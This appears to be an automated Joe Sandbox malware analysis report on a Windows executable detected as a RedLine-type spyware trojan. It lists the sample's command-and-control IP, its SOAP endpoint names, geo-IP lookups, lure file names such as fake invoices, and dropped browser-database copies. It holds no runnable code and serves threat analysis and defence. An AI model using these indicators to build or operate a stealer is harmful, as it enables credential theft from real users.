                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/EnvironmentSettingsa591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 2%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ip.sb/geoip%USERPEnvironmentROFILE%a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exefalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ip.sba591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.00000000033C0000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ip.sb/geoipa591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.00000000033C0000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/soap/envelope/a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.00000000033C0000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmp78A1.tmp.0.dr, tmp78C2.tmp.0.dr, tmp78B2.tmp.0.dr, tmp78D3.tmp.0.dr, tmp78E4.tmp.0.dr, tmpB297.tmp.0.dr, tmpB266.tmp.0.dr, tmp78E3.tmp.0.dr, tmpB298.tmp.0.dr, tmpB245.tmp.0.dr, tmpB267.tmp.0.dr, tmpB256.tmp.0.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.00000000033C0000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Endpoint/CheckConnecta591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 2%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmp78A1.tmp.0.dr, tmp78C2.tmp.0.dr, tmp78B2.tmp.0.dr, tmp78D3.tmp.0.dr, tmp78E4.tmp.0.dr, tmpB297.tmp.0.dr, tmpB266.tmp.0.dr, tmp78E3.tmp.0.dr, tmpB298.tmp.0.dr, tmpB245.tmp.0.dr, tmpB267.tmp.0.dr, tmpB256.tmp.0.drfalse
                      • URL Reputation: safe
                      unknown
                      https://www.ecosia.org/newtab/tmp78A1.tmp.0.dr, tmp78C2.tmp.0.dr, tmp78B2.tmp.0.dr, tmp78D3.tmp.0.dr, tmp78E4.tmp.0.dr, tmpB297.tmp.0.dr, tmpB266.tmp.0.dr, tmp78E3.tmp.0.dr, tmpB298.tmp.0.dr, tmpB245.tmp.0.dr, tmpB267.tmp.0.dr, tmpB256.tmp.0.drfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Endpoint/VerifyUpdateResponsea591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/SetEnvirona591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.000000000360E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/SetEnvironmenta591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.000000000360E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/SetEnvironmentResponsea591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/GetUpdatesa591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003401000.00000004.00000800.00020000.00000000.sdmp, a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003501000.00000004.00000800.00020000.00000000.sdmp, a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.00000000033E8000.00000004.00000800.00020000.00000000.sdmp, a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.00000000033C0000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://ac.ecosia.org/autocomplete?q=tmp78A1.tmp.0.dr, tmp78C2.tmp.0.dr, tmp78B2.tmp.0.dr, tmp78D3.tmp.0.dr, tmp78E4.tmp.0.dr, tmpB297.tmp.0.dr, tmpB266.tmp.0.dr, tmp78E3.tmp.0.dr, tmpB298.tmp.0.dr, tmpB245.tmp.0.dr, tmpB267.tmp.0.dr, tmpB256.tmp.0.drfalse
                      • URL Reputation: safe
                      unknown
                      https://api.ipify.orgcookies//settinString.Removega591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exefalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressinga591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Endpoint/GetUpdatesResponsea591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmp78A1.tmp.0.dr, tmp78C2.tmp.0.dr, tmp78B2.tmp.0.dr, tmp78D3.tmp.0.dr, tmp78E4.tmp.0.dr, tmpB297.tmp.0.dr, tmpB266.tmp.0.dr, tmp78E3.tmp.0.dr, tmpB298.tmp.0.dr, tmpB245.tmp.0.dr, tmpB267.tmp.0.dr, tmpB256.tmp.0.drfalse
                      • URL Reputation: safe
                      unknown
                      http://185.38.142.10a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.000000000360E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 12%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/EnvironmentSettingsResponsea591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/VerifyUpdatea591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/0a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namea591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmp78A1.tmp.0.dr, tmp78C2.tmp.0.dr, tmp78B2.tmp.0.dr, tmp78D3.tmp.0.dr, tmp78E4.tmp.0.dr, tmpB297.tmp.0.dr, tmpB266.tmp.0.dr, tmp78E3.tmp.0.dr, tmpB298.tmp.0.dr, tmpB245.tmp.0.dr, tmpB267.tmp.0.dr, tmpB256.tmp.0.drfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/soap/actor/nexta591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      185.38.142.10
                      unknownPortugal
                      47674NETSOLUTIONSNLtrue
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1464083
                      Start date and time:2024-06-28 12:01:03 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 2m 52s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:3
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@2/45@1/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 26
                      • Number of non-executed functions: 2
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated
                      • Exclude process from analysis (whitelisted): SIHClient.exe
                      • Excluded IPs from analysis (whitelisted): 104.26.13.31, 104.26.12.31, 172.67.75.172
                      • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, slscr.update.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      TimeTypeDescription
                      06:02:00API Interceptor34x Sleep call for process: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.38.142.10b3u71vBG0u.exeGet hashmaliciousRedLineBrowse
                      • 185.38.142.10:7474/
                      2MbHBiqXH2.rtfGet hashmaliciousRedLineBrowse
                      • 185.38.142.10:7474/
                      YPSvIjQCzd.exeGet hashmaliciousRedLineBrowse
                      • 185.38.142.10:7474/
                      Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docGet hashmaliciousRedLineBrowse
                      • 185.38.142.10:7474/
                      MSH INV 2024-0117 Secure Payment Invoice for .exeGet hashmaliciousRedLineBrowse
                      • 185.38.142.10:7474/
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      NETSOLUTIONSNLb3u71vBG0u.exeGet hashmaliciousRedLineBrowse
                      • 185.38.142.10
                      2MbHBiqXH2.rtfGet hashmaliciousRedLineBrowse
                      • 185.38.142.10
                      YPSvIjQCzd.exeGet hashmaliciousRedLineBrowse
                      • 185.38.142.10
                      Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docGet hashmaliciousRedLineBrowse
                      • 185.38.142.10
                      MSH INV 2024-0117 Secure Payment Invoice for .exeGet hashmaliciousRedLineBrowse
                      • 185.38.142.10
                      sclfmLKwR7.elfGet hashmaliciousGafgyt, MiraiBrowse
                      • 185.38.142.103
                      3nYvEPuDi1.elfGet hashmaliciousGafgyt, MiraiBrowse
                      • 185.38.142.103
                      DS4T3FyXbu.elfGet hashmaliciousGafgyt, MiraiBrowse
                      • 185.38.142.103
                      pDHAW6Eo6E.elfGet hashmaliciousGafgytBrowse
                      • 185.38.142.103
                      q5TDXPUPJg.elfGet hashmaliciousGafgytBrowse
                      • 185.38.142.22
                      No context
                      No context
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):2666
                      Entropy (8bit):5.345804351520589
                      Encrypted:false
                      SSDEEP:48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHjHKx1qHpHsLU:vq5qxqdqolqztYqh3oPtI6mq7qoT5DqO
                      MD5:99EF806358EC635615FCC973DA805A5D
                      SHA1:3D5E802B056A5CABB53707A30D60F9E8294CEC13
                      SHA-256:99957E097E6DB3573742EFD7B473D80998DE5AEF0E473D2C505EBBB1252E8285
                      SHA-512:7B340970383EB8685E2D3ADFE94E1B253DF7444ACA6EEA5859ED2DFFBCBCAFECE645961FF0C76E365EBA8ABF7A6444414E8D97363CC09BD34362E234DC51F21E
                      Malicious:true
                      Reputation:moderate, very likely benign file
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.705615236042988
                      Encrypted:false
                      SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                      MD5:159C7BA9D193731A3AAE589183A63B3F
                      SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                      SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                      SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                      Malicious:false
